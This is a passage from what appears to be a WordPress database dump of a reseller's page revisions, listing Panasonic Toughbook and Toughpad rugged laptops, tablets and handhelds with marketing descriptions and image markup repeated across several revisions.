TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:49:51','2018-12-21 01:49:51','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2686,1,'2018-12-21 09:50:28','2018-12-21 01:50:28','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5><strong>PRODUCT</strong> DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header><h5>PRODUCT DETAILS</h5><p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:50:28','2018-12-21 01:50:28','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2687,1,'2018-12-21 09:51:13','2018-12-21 01:51:13','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5><strong>PRODUCT</strong> DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header><h5>PRODUCT DETAILS</h5><p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" 